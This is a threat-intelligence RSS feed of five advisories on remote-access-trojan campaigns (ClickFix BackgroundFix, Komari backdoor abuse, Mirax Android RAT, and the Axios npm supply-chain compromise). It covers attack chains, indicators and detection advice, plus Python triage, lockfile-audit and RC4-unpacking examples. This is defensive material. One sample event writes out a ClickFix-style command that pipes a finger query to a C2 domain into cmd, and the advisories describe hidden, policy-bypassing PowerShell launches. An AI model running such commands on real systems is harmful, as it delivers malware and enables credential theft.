<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Rat — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/rat/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Thu, 30 Apr 2026 13:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/rat/feed.xml" rel="self" type="application/rss+xml"/><item><title>ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer</title><link>https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/</link><pubDate>Thu, 30 Apr 2026 13:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-clickfix-backgroundfix/</guid><description>The 'BackgroundFix' ClickFix campaign uses social engineering to trick victims into downloading malware disguised as a free image-editing tool, leading to the deployment of CastleLoader, NetSupport RAT for remote access, and CastleStealer for credential theft.</description><content:encoded><![CDATA[<p>The BackgroundFix campaign is a social engineering scheme using fake &ldquo;remove your photo background&rdquo; services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. This campaign delivers a multi-stage payload, starting with CastleLoader. 
CastleLoader then drops NetSupport RAT, enabling remote access for the attackers, and CastleStealer, a custom .NET stealer designed to exfiltrate browser credentials, wallet extension data, and Telegram session files. This campaign appears to be active, with multiple domains sharing the same template.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Victim searches for an online background removal tool and lands on a malicious BackgroundFix site.</li>
<li>The victim uploads an image to the fake website.</li>
<li>After clicking a checkbox, the site instructs the victim to copy a command to their clipboard.</li>
<li>The copied command executes <code>finger.exe</code>, a legitimate Windows binary, to query <code>cheeshomireciple[.]com</code>.</li>
<li><code>finger.exe</code> retrieves a batch script from the C2 server over the finger protocol (TCP/79), so the download involves neither a browser nor the usual HTTP download tooling.</li>
<li>The batch script executes commands to download and execute further payloads.</li>
<li>CastleLoader is deployed, subsequently dropping NetSupport RAT and CastleStealer.</li>
<li>NetSupport RAT grants the attacker remote access, while CastleStealer exfiltrates sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful attacks result in the installation of NetSupport RAT, granting attackers remote control over the compromised system. Additionally, CastleStealer exfiltrates sensitive information such as browser credentials, wallet extension data, and Telegram session files. This stolen data can be used for further malicious activities, including financial fraud, identity theft, and unauthorized access to sensitive accounts. The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process creation events for any execution of <code>finger.exe</code>: it ships with Windows but has no routine business use, so every execution deserves review, and a command line pointing to an external domain (IOC: <code>cheeshomireciple[.]com</code>) is a strong signal. Because finger uses TCP/79, blocking outbound port 79 at the egress firewall also breaks this delivery path.</li>
<li>Deploy the Sigma rule to detect the execution of <code>finger.exe</code> to identify potential initial access attempts.</li>
<li>Block the C2 domain <code>cheeshomireciple[.]com</code> at the DNS resolver to prevent initial payload delivery.</li>
<li>Monitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: <code>poronto[.]com:688</code>, <code>giovettiadv[.]com:688</code>).</li>
</ul>
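<p>The first two recommendations above, as an added example that is not part of the original brief: a small Python triage of process-creation events (Sysmon Event ID 1 field names) that flags every <code>finger.exe</code> execution and raises the severity when the <code>user@host</code> argument names a host outside the organisation or the known C2 domain. The sample events, the internal DNS suffix and the internal address ranges are constructed assumptions to adapt to your environment.</p>

```python
"""Added example (not CraftedSignal's or the campaign's code): flag
finger.exe process-creation events whose command line queries an external
host. finger.exe ships with Windows and takes `[user]@host` arguments; it has
no routine business use, so any execution is worth a look, and a query to a
host outside the organisation is the ClickFix pattern described above.
The events below are constructed Sysmon-style records, not real telemetry;
the internal suffix and address ranges are assumptions to adapt."""
import re
from ipaddress import ip_address, ip_network
from typing import Optional

INTERNAL_SUFFIXES = (".corp.example",)                       # assumed internal DNS suffix
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KNOWN_BAD = {"cheeshomireciple.com"}                         # IOC from the brief, refanged

# finger syntax is `finger [-l] [user]@host ...`; capture everything after each '@'.
HOST_RE = re.compile(r"@([A-Za-z0-9.\-\[\]]+)")


def extract_hosts(cmdline: str) -> list:
    """Every host named by a user@host argument, refanged and lower-cased."""
    return [h.replace("[.]", ".").lower().rstrip(".") for h in HOST_RE.findall(cmdline)]


def is_internal(host: str) -> bool:
    try:
        return any(ip_address(host) in net for net in INTERNAL_NETS)
    except ValueError:                                       # not an IP literal: check the name
        return host.endswith(INTERNAL_SUFFIXES)


def classify(event: dict) -> Optional[str]:
    """Severity label for one process-creation event, or None if not finger.exe."""
    if not event.get("Image", "").lower().endswith("\\finger.exe"):
        return None
    hosts = extract_hosts(event.get("CommandLine", ""))
    if any(h in KNOWN_BAD for h in hosts):
        return "critical: finger.exe query to known C2 host"
    if any(not is_internal(h) for h in hosts):
        return "high: finger.exe query to external host"
    return "medium: finger.exe executed"                     # rare enough to review regardless


# Constructed sample events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger root@cheeshomireciple[.]com | cmd"},
    {"ProcessId": 4121, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger user@203.0.113.7"},
    {"ProcessId": 4122, "Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "finger admin@files.corp.example"},
    {"ProcessId": 4123, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]


def run(events=SAMPLE_EVENTS) -> dict:
    """Map ProcessId -> severity label for every finger.exe event."""
    hits = {}
    for ev in events:
        label = classify(ev)
        if label:
            hits[ev["ProcessId"]] = label
    return hits


if __name__ == "__main__":
    for pid, label in run().items():
        print(pid, label)
```

<p>Feed it real Sysmon or EDR process events instead of <code>SAMPLE_EVENTS</code>; the pipe to <code>cmd</code> in the first constructed event is the shape a ClickFix clipboard command takes, but the logic does not depend on it, so it still fires when the script is staged differently.</p>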
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>clickfix</category><category>malware</category><category>social-engineering</category><category>rat</category><category>infostealer</category><category>castleloader</category><category>netsupport</category></item><item><title>Komari Agent Abused as SYSTEM-Level Backdoor</title><link>https://feed.craftedsignal.io/briefs/2026-04-komari-red/</link><pubDate>Thu, 30 Apr 2026 00:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-komari-red/</guid><description>Threat actors are abusing the Komari monitoring agent, a project hosted on GitHub, as a SYSTEM-level backdoor following initial access through compromised VPN credentials and lateral movement via Impacket.</description><content:encoded><![CDATA[<p>Huntress discovered threat actors using the Komari monitoring agent as a SYSTEM-level backdoor in a partner environment. Komari, a Go-based project on GitHub with over 4,000 stars, is designed as a remote-control and monitoring tool, and its default feature set (remote command execution over a persistent WebSocket connection and interactive terminal sessions) already amounts to a command-and-control (C2) channel. This incident is a publicly documented case of Komari being abused in a real-world intrusion. The attackers gained initial access with compromised VPN credentials, then installed the Komari agent as a persistent Windows service named &ldquo;Windows Update Service&rdquo; using NSSM, downloading the agent directly from the official GitHub repository so that no attacker-controlled staging infrastructure was needed. The initial discovery occurred on April 16, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> The attacker establishes an SSLVPN session on a FortiGate device from IP address 45.153.34[.]132, authenticating as a legitimate user, [User 1].</li>
<li><strong>Internal Reconnaissance:</strong> After establishing the VPN connection, the attacker&rsquo;s workstation, identified as VM8514, begins enumerating the internal network from the tunnel IP 10.212.134[.]200.</li>
<li><strong>Lateral Movement:</strong> Using Impacket&rsquo;s smbexec.py, the attacker enables Remote Desktop Protocol (RDP) on the target workstation, [REDACTED-WRKSTN].</li>
<li><strong>RDP Access:</strong> The attacker establishes an interactive RDP session to [REDACTED-WRKSTN].</li>
<li><strong>Persistence - Service Creation:</strong> The attacker uses the Non-Sucking Service Manager (NSSM) to install the Komari agent as a persistent Windows service named &ldquo;Windows Update Service&rdquo;.</li>
<li><strong>Agent Download:</strong> The Komari agent is downloaded from raw.githubusercontent[.]com/komari-monitor/komari-agent using a PowerShell one-liner executed directly on the system.</li>
<li><strong>Command and Control:</strong> The Komari agent establishes a persistent WebSocket connection to its server, allowing the attacker to execute arbitrary commands (PowerShell/sh) and initiate interactive PTY reverse shell sessions.</li>
<li><strong>Maintain Access &amp; Execute:</strong> The attacker maintains SYSTEM-level access via the persistent Komari agent, enabling ongoing remote command execution and control over the compromised workstation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This attack demonstrates how readily available monitoring tools can be weaponized for malicious purposes. A single compromised account led to the establishment of a SYSTEM-level backdoor on a critical workstation. This could result in data exfiltration, further lateral movement within the network, and potentially ransomware deployment. Microsoft Defender quarantined an earlier registry hive dumping attempt, preventing further data compromise. The number of affected organizations is currently unknown, but any organization using the Komari agent without proper security controls is potentially at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor FortiGate logs for SSLVPN sessions originating from suspicious IP addresses (45.153.34[.]132) or from ASNs your users do not normally connect from (ASN 51396 in this intrusion) to detect compromised credentials.</li>
<li>Implement the Sigma rule &ldquo;Detect Komari Agent Installation via PowerShell&rdquo; to identify installations of the Komari agent.</li>
<li>Monitor process creation events for the execution of <code>nssm.exe</code> installing a service named &ldquo;Windows Update Service&rdquo; to detect suspicious service installations.</li>
<li>Blocking raw.githubusercontent[.]com at the DNS resolver or web proxy cuts off this download path, but it also breaks legitimate developer and automation workflows; where a blanket block is not viable, alert on downloads from the komari-monitor/komari-agent path and on PowerShell processes fetching from that domain.</li>
</ul>
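<p>The NSSM persistence step and the service-name recommendation above, as an added example that is not part of the original brief or of Komari: a Python triage of Windows System-log Event ID 7045 (&ldquo;A service was installed in the system&rdquo;) records that flags a service whose name imitates Windows Update but which is not hosted by <code>svchost.exe</code>, or whose binary is an NSSM wrapper outside <code>%SystemRoot%</code>. The records are constructed; the NSSM binary names are an assumption.</p>

```python
"""Added example (not Huntress's or Komari's code): triage Windows System-log
Event ID 7045 ("A service was installed in the system") records for the
persistence pattern in this brief: a service whose name imitates Windows
Update but whose binary is an NSSM wrapper or lives outside %SystemRoot%.
The records are constructed; field names follow the 7045 event. The genuine
Windows Update service (wuauserv, display name "Windows Update") is hosted
by svchost.exe under %SystemRoot%\system32, which is the exclusion used."""
import re
from typing import Optional

LOOKALIKE_RE = re.compile(r"windows\s*update", re.I)
WRAPPER_RE = re.compile(r"(^|\\)nssm(64)?\.exe\b", re.I)      # assumed: NSSM's usual binary names
SYSTEMROOT_RE = re.compile(r"^(%systemroot%|c:\\windows)\\", re.I)
SVCHOST_RE = re.compile(r"^(%systemroot%|c:\\windows)\\system32\\svchost\.exe\b", re.I)


def _image_exe(image_path: str) -> str:
    """Strip surrounding quotes and service arguments, leaving the executable path."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    return p.split(" ", 1)[0]


def assess(rec: dict) -> Optional[dict]:
    """Return a finding for one 7045 record, or None for an unremarkable install."""
    name = rec["ServiceName"]
    exe = _image_exe(rec["ImagePath"])
    lookalike = bool(LOOKALIKE_RE.search(name)) and not SVCHOST_RE.match(exe)
    wrapper = bool(WRAPPER_RE.search(exe))
    outside = not SYSTEMROOT_RE.match(exe)
    reasons = []
    if lookalike:
        reasons.append("name imitates Windows Update but is not hosted by svchost.exe")
    if wrapper:
        reasons.append("binary is an NSSM wrapper")
    if (lookalike or wrapper) and outside:
        reasons.append("binary outside %SystemRoot%")
    if not reasons:                    # ordinary third-party installs land here
        return None
    severity = "high" if wrapper or (lookalike and outside) else "review"
    return {"ServiceName": name, "ImagePath": exe, "Account": rec.get("AccountName", ""),
            "severity": severity, "reasons": reasons}


# Constructed 7045 records (ServiceName, ImagePath, ServiceType, StartType, AccountName).
SAMPLE_7045 = [
    {"ServiceName": "Windows Update Service", "ImagePath": r"C:\Users\Public\nssm.exe",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Windows Update", "ImagePath": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Vendor Agent", "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service',
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Windows Update Helper", "ImagePath": r"C:\ProgramData\helper.exe",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
]


def run(records=SAMPLE_7045) -> list:
    """All findings for a batch of 7045 records."""
    return [f for f in map(assess, records) if f]


if __name__ == "__main__":
    for f in run():
        print(f["severity"], f["ServiceName"], "->", f["ImagePath"], "|", "; ".join(f["reasons"]))
```

<p>A 7045 record for an NSSM-installed service only names <code>nssm.exe</code>; the program it actually wraps (here the Komari agent) is stored by NSSM under <code>HKLM\SYSTEM\CurrentControlSet\Services\&lt;name&gt;\Parameters\Application</code>, so pull that value during triage to identify the real payload.</p>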
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>komari</category><category>backdoor</category><category>nssm</category><category>github</category><category>rat</category><category>reverse shell</category></item><item><title>Mirax RAT Targeting Android Users in Europe</title><link>https://feed.craftedsignal.io/briefs/2026-04-mirax-rat/</link><pubDate>Thu, 16 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-mirax-rat/</guid><description>Mirax RAT, a new Android RAT distributed as MaaS, is targeting European users by turning infected devices into residential proxy nodes and enabling credential theft via overlay and notification injection.</description><content:encoded><![CDATA[<p>The Mirax RAT is a newly identified Android Remote Access Trojan (RAT) that has been actively targeting users in Europe since March 2026. It&rsquo;s offered as Malware-as-a-Service (MaaS) to a small group of affiliates, primarily Russian-speaking actors, through tiered subscription models. Since December 2025, Mirax has been promoted on underground forums and used in multiple campaigns. The RAT&rsquo;s distribution relies on malicious advertisements on Meta platforms like Facebook, Instagram, and Messenger, with over 200,000 users potentially exposed to these ads. The malware uses dropper pages hosted on GitHub and relies on APK sideloading for execution, bypassing the Google Play Store&rsquo;s security measures. Mirax&rsquo;s capabilities extend beyond typical RAT functions, including turning infected devices into residential proxy nodes via a SOCKS5 proxy.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker creates malicious ads on Facebook, Instagram, and Messenger promoting IPTV application services.</li>
<li>Users click on the advertisements, which redirect them to dropper pages hosted on GitHub.</li>
<li>The user is prompted to enable installation from unknown sources on their Android device.</li>
<li>The malicious IPTV application is installed via APK sideloading.</li>
<li>The application initiates a multi-stage infection process, utilizing Golden Encryption (Golden Crypt) to pack the payload.</li>
<li>The payload, an encrypted Dalvik Executable (.dex) file, is decrypted during installation using the RC4 stream cipher with a hardcoded key.</li>
<li>Mirax gains control of the device, enabling overlay and notification injection for credential theft.</li>
<li>Attackers can view the screen in real-time, navigate and control the device, manage applications, exfiltrate images and text, and launch a SOCKS5 proxy connection to proxy traffic through the infected device.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The Mirax RAT campaign has the potential to affect a large number of Android users in Europe. The malicious advertisements have already reached over 200,000 users. Successful infections can lead to credential theft, financial fraud, data exfiltration, and the compromised device being used as a residential proxy, potentially masking malicious activity and further expanding the attacker&rsquo;s reach. Banks and financial institutions are specifically highlighted as high-value targets.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor network traffic for connections to GitHub domains associated with APK downloads and correlate them with Android device user agents (network connection and user-agent logs).</li>
<li>Implement detections for process creation events related to sideloaded APK installations, specifically looking for unusual parent-child process relationships (Process Creation Logs).</li>
<li>Deploy the Sigma rule provided below to detect the execution of applications from untrusted sources and tune for your environment.</li>
<li>Monitor network connections for SOCKS5 proxy traffic originating from Android devices, which may indicate compromised devices acting as residential proxies (Network Connection Logs).</li>
</ul>
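<p>Steps 5 and 6 of the attack chain above (a packed <code>.dex</code> decrypted with RC4 under a hard-coded key), as an added analyst-side example that is not Mirax&rsquo;s or Golden Crypt&rsquo;s code: once the key has been pulled from the dropper, the payload can be unpacked offline and confirmed by its fixed DEX header magic, and because that magic is known plaintext the first keystream bytes can be recovered from the ciphertext alone to test candidate keys cheaply. The key and the packed sample are constructed; the real dropper may add layers beyond a plain RC4 stream.</p>

```python
"""Added example (not Mirax's or Golden Crypt's code): once the hard-coded
RC4 key has been pulled from the dropper, the packed .dex can be decrypted
offline and the result confirmed by its fixed DEX header magic ("dex\n035\0").
Because that magic is known plaintext, the first eight keystream bytes can also
be recovered from the ciphertext alone, which is a quick way to test candidate
keys or to confirm the packer is a plain RC4 stream before any key is known.
RC4 is written out here (KSA + PRGA); the key and the sample are constructed."""

DEX_MAGIC = b"dex\n035\0"


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 encrypt/decrypt (the cipher is symmetric). Analysis use only."""
    S = list(range(256))
    j = 0
    for i in range(256):                                   # key scheduling (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                      # keystream generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def keystream_prefix(ciphertext: bytes, known_plain: bytes = DEX_MAGIC) -> bytes:
    """Known-plaintext recovery of the keystream bytes that cover the DEX magic."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plain))


def key_matches(key: bytes, ciphertext: bytes) -> bool:
    """Cheap check: does this key reproduce the recovered keystream prefix?"""
    return rc4(key, bytes(len(DEX_MAGIC))) == keystream_prefix(ciphertext)


def unpack(ciphertext: bytes, candidate_keys):
    """Return (key, plaintext) for the first candidate that yields a DEX file."""
    for key in candidate_keys:
        if key_matches(key, ciphertext):
            plain = rc4(key, ciphertext)
            if plain.startswith(DEX_MAGIC):
                return key, plain
    return None


# Constructed sample: a stub "dex" (magic plus filler) packed with an assumed key.
ASSUMED_KEY = b"GoldenCryptDemoKey"                      # hypothetical, not the real key
SAMPLE_DEX = DEX_MAGIC + bytes(range(64))
PACKED = rc4(ASSUMED_KEY, SAMPLE_DEX)


def demo():
    """Try a wrong key first, then the right one; returns the key that worked."""
    result = unpack(PACKED, [b"wrong-key", ASSUMED_KEY])
    return result[0] if result else None


if __name__ == "__main__":
    print(demo(), keystream_prefix(PACKED).hex())
```

<p>In practice the candidate list comes from strings and constants in the dropper&rsquo;s decryption routine; <code>key_matches</code> rejects a wrong key after encrypting eight bytes, so thousands of candidates can be tried before decrypting anything in full.</p>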
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>android</category><category>rat</category><category>mirax</category><category>malware-as-a-service</category><category>proxy</category></item><item><title>Axios npm Package Compromised via Social Engineering</title><link>https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/</link><pubDate>Sat, 04 Apr 2026 20:30:42 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-axios-npm-hack/</guid><description>North Korean threat actors (UNC1069) compromised the Axios npm package by socially engineering a maintainer with a fake Microsoft Teams update delivering a RAT, leading to the injection of a malicious dependency and a supply chain attack.</description><content:encoded><![CDATA[<p>On April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer&rsquo;s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. These versions were available for three hours, posing a supply chain risk to any systems that installed them during that period.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.</li>
<li>The attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.</li>
<li>A meeting is scheduled on Microsoft Teams, during which a fake &ldquo;RTC Connection&rdquo; error message is displayed.</li>
<li>The attacker prompts the developer to install a &ldquo;Teams update&rdquo; to resolve the error.</li>
<li>The fake update is a RAT malware, granting the attacker remote access to the developer&rsquo;s machine.</li>
<li>The attacker steals the developer&rsquo;s npm credentials and reuses the already-authenticated session, so MFA is never challenged.</li>
<li>The attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.</li>
<li>Systems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window are considered compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. This can lead to further unauthorized access, data breaches, and potential financial loss.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor npm package installations for the presence of the plain-crypto-js dependency, particularly in projects that use Axios versions 1.14.1 or 0.30.4.</li>
<li>Implement multi-factor authentication (MFA) for npm accounts and other developer accounts, but recognize that authenticated sessions can be hijacked.</li>
<li>Deploy the Sigma rule &ldquo;Detect Suspicious NPM Package Installation&rdquo; to detect potentially malicious package installations based on unusual parent processes (see below).</li>
<li>Block the infrastructure contacted by the malicious plain-crypto-js dependency at the DNS resolver and network perimeter (its IP address and domain are listed in the companion brief on this attack).</li>
<li>Educate developers about social engineering tactics and the risks of installing software from untrusted sources.</li>
</ul>
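<p>The first recommendation above (checking installs for the compromised axios versions and the plain-crypto-js dependency), as an added example that is not Axios&rsquo;s or npm&rsquo;s code: a Python scan of <code>package-lock.json</code> that handles both the flat <code>packages</code> map of lockfileVersion 2/3 and the nested <code>dependencies</code> tree of lockfileVersion 1, and reports the <code>node_modules</code> path so you can see which direct dependency pulled the bad package in. The lock-file content and the plain-crypto-js version string are constructed.</p>

```python
"""Added example (not Axios's or npm's code): scan a package-lock.json for the
compromised axios versions and the rogue plain-crypto-js dependency, and
report the node_modules path so you can see which direct dependency pulled
them in. lockfileVersion 2 and 3 files carry a flat "packages" map keyed by
node_modules path; lockfileVersion 1 nests a "dependencies" tree, which is
flattened here the same way. The lock-file content and the plain-crypto-js
version string are constructed for the demo."""
import json
from typing import Iterator, Tuple

COMPROMISED = {"axios": {"1.14.1", "0.30.4"}}      # versions named in the brief
ROGUE = {"plain-crypto-js"}                          # dependency the bad versions introduced


def pkg_name(path: str) -> str:
    """'node_modules/@usebruno/cli/node_modules/axios' -> 'axios'."""
    return path.rsplit("node_modules/", 1)[-1]


def iter_packages(lock: dict) -> Iterator[Tuple[str, str, str]]:
    """Yield (node_modules path, package name, version) for every installed package."""
    if "packages" in lock:                                  # lockfileVersion 2/3
        for path, meta in lock["packages"].items():
            if path:                                        # "" is the root project itself
                yield path, pkg_name(path), meta.get("version", "")
    else:                                                   # lockfileVersion 1
        def walk(deps: dict, prefix: str):
            for name, meta in deps.items():
                path = f"{prefix}node_modules/{name}"
                yield path, name, meta.get("version", "")
                yield from walk(meta.get("dependencies", {}), path + "/")
        yield from walk(lock.get("dependencies", {}), "")


def audit(lock: dict) -> list:
    """Findings for known-bad versions and rogue packages, with their install paths."""
    findings = []
    for path, name, version in iter_packages(lock):
        if name in ROGUE:
            findings.append({"path": path, "reason": f"rogue dependency {name}@{version}"})
        elif version in COMPROMISED.get(name, ()):
            findings.append({"path": path, "reason": f"compromised {name}@{version}"})
    return findings


def audit_file(lockfile_path: str) -> list:
    with open(lockfile_path, encoding="utf-8") as fh:
        return audit(json.load(fh))


# Constructed lockfileVersion 3 document mirroring the @usebruno/cli case.
SAMPLE_LOCK = {
    "name": "demo-app", "lockfileVersion": 3, "packages": {
        "": {"name": "demo-app", "dependencies": {"@usebruno/cli": "^2.0.0"}},
        "node_modules/@usebruno/cli": {"version": "2.0.0", "dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {"version": "1.14.1", "dependencies": {"plain-crypto-js": "*"}},
        "node_modules/plain-crypto-js": {"version": "0.0.0-demo", "hasInstallScript": True},
        "node_modules/lodash": {"version": "4.17.21"},
    },
}


def run() -> list:
    return audit(SAMPLE_LOCK)


if __name__ == "__main__":
    for f in run():
        print(f["reason"], "at", f["path"])
```

<p>Run <code>audit_file("package-lock.json")</code> across every repository and build agent, not just developer laptops; a CI runner that installed within the window is just as compromised. <code>npm ls axios</code> and <code>npm ls plain-crypto-js</code> give the same dependency chain interactively.</p>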
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>supply chain attack</category><category>npm</category><category>social engineering</category><category>rat</category><category>unc1069</category></item><item><title>Axios NPM Supply Chain Attack Delivering Platform-Specific RATs</title><link>https://feed.craftedsignal.io/briefs/2026-04-axios-npm-supply-chain/</link><pubDate>Sat, 04 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-axios-npm-supply-chain/</guid><description>A supply chain attack on the Axios NPM package injected malicious code into versions v1.14.1 and v0.30.4, leading to the deployment of platform-specific remote access trojans (RATs) after the installation of a rogue dependency that communicated with attacker-controlled infrastructure to retrieve malicious payloads for Windows, MacOS, and Linux.</description><content:encoded><![CDATA[<p>On March 31, 2026, the official Axios node package manager (npm) package was compromised in a supply chain attack. The attack resulted in the deployment of two malicious versions, v1.14.1 and v0.30.4. Axios is a widely-used JavaScript library for making HTTP requests, with approximately 100 million downloads per week. The malicious packages were available for around three hours. The compromised packages introduced a fake runtime dependency, &lsquo;plain-crypto-js&rsquo;, that executes automatically after installation. This dependency then communicates with attacker-controlled infrastructure at 142.11.206.73, pulling down platform-specific payloads for Linux, MacOS, and Windows. The payloads are remote access trojans (RATs), enabling the attackers to gather information and execute additional malicious activities.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker compromised the Axios NPM package and injected malicious code.</li>
<li>Malicious versions v1.14.1 and v0.30.4 were published to the NPM registry.</li>
<li>The malicious packages introduce a fake runtime dependency named &lsquo;plain-crypto-js&rsquo;.</li>
<li>Upon installation of the compromised package, the &lsquo;plain-crypto-js&rsquo; dependency executes automatically via a post-install script.</li>
<li>The dependency connects to the attacker-controlled IP address 142.11.206.73 to retrieve a platform-specific payload.</li>
<li>On MacOS, a binary named &ldquo;com.apple.act.mond&rdquo; is downloaded and executed using zsh.</li>
<li>On Windows, a PowerShell script (6202033.ps1) is downloaded, the legitimate powershell.exe is copied to &ldquo;%PROGRAMDATA%\wt.exe&rdquo;, and the script is run through that copy with the hidden-window and execution-policy-bypass switches, so the interpreter appears under a process name that does not look like PowerShell.</li>
<li>On Linux, a Python backdoor is downloaded and executed. The downloaded executables act as Remote Access Trojans (RATs) exfiltrating credentials and enabling remote management.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack could lead to significant compromise across numerous organizations using the Axios library. The actors exfiltrate credentials and gain remote management capabilities. All credentials present on systems that installed the malicious package should be considered compromised and immediately rotated. The widespread use of Axios means the impact could extend to many applications and systems, potentially enabling further attacks leveraging compromised credentials. Supply chain attacks like these affecting widely used libraries, as seen in 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review, highlight the substantial risk they pose.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Pin to the last known-good Axios versions (v1.14.0 or v0.30.3) and reinstall dependencies, then confirm the lock file no longer resolves v1.14.1 or v0.30.4.</li>
<li>Investigate every system that installed v1.14.1 or v0.30.4 for the follow-on payloads from the actor-controlled infrastructure (the platform-specific stages described in the attack chain).</li>
<li>Block the actor-controlled IP address 142.11.206.73 and the domain Sfrclak.com at the network perimeter to cut off communication with the malicious infrastructure, per the IOC list.</li>
<li>Monitor for PowerShell running from unusual locations, specifically a copy at &ldquo;%PROGRAMDATA%\wt.exe&rdquo;, and more generally for any process whose PE OriginalFileName is PowerShell.EXE but whose on-disk name is not.</li>
<li>Correlate network-connection events with the initiating process and alert when an uncommon parent (for example node or npm during a package install) spawns a process that connects to an external IP. See example rule below.</li>
</ul>
